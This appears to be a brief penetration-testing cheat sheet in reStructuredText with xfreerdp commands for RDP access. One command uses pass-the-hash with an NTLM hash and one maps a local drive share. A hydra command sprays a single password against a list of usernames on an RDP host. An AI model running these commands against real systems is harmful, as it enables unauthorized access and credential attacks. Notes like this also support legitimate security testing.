###
RDP
###

.. code-block:: bash

    xfreerdp /u:user /p:pass /v:1.2.3.4 +clipboard /cert:ignore /dynamic-resolution

    mkdir /tmp/share
    xfreerdp /u:'user' /p:'pass' /v:1.2.3.4 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share

    xfreerdp /d:domain.com /u:user /pth:fdf36048c1cf88f5630381c5e38feb8e /v:1.2.3.4 +clipboard /cert:ignore /dynamic-resolution

|

*******
Fuzzing
*******

.. code-block:: bash

    cat <<'EOF'>/tmp/users
    justin
    daniel
    EOF
    hydra -L /tmp/users -p "password" rdp://192.168.235.202
